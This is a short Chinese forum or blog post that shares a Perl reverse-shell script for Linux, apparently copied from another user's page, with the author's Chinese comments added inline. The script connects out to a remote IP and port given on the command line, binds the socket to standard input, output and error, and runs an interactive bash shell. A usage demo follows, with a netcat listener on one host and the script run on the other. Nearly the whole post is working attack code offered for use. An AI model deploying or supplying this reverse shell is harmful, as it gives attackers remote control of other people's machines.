说明:这个反弹shell的代码来自 anonymouslogin 的百度空间,无意中看到,用于Linux下面,和以前我在POC上看到的一个 comeback.pl代码很像很像 本人暂时没有测试 手头没有的Linux机子... 代码是我自己加上去的
laiwei@debian:~$ cat rebound.pl '用cat命令查看
#!/usr/bin/perl -w
#use strict;
use Socket; '定义socket,准备套接字 use IO::Handle; '这个是句柄if($#ARGV+1 != 2){
print "$#ARGV $0 Remote_IP Remote_Port \n"; exit 1; }my $remote_ip = $ARGV[0]; 'ARGV数组里面放公网IP和端口号
my $remote_port = $ARGV[1];my $proto = getprotobyname("tcp");
my $pack_addr = sockaddr_in($remote_port, inet_aton($remote_ip));my $shell = '/bin/bash -i';
socket(SOCK, AF_INET, SOCK_STREAM, $proto); '这个东西学过VC++网络编程的人就能看懂,2个月前我看不懂 呵呵
STDOUT->autoflush(1);
SOCK->autoflush(1);connect(SOCK,$pack_addr) or die "can not connect:$!";
open STDIN, "<&SOCK";
open STDOUT, ">&SOCK"; open STDERR, ">&SOCK";print "Enjoy the shell.\n";
system($shell); '执行
close SOCK; '关闭SOCKET会话exit 0;
-------------------------------------------------------------------------------------------------------演示:
在主机A上面
nc -l -p 8888 -vv
在主机B上面
./rebound.pl AA.AA.AA.AA 8888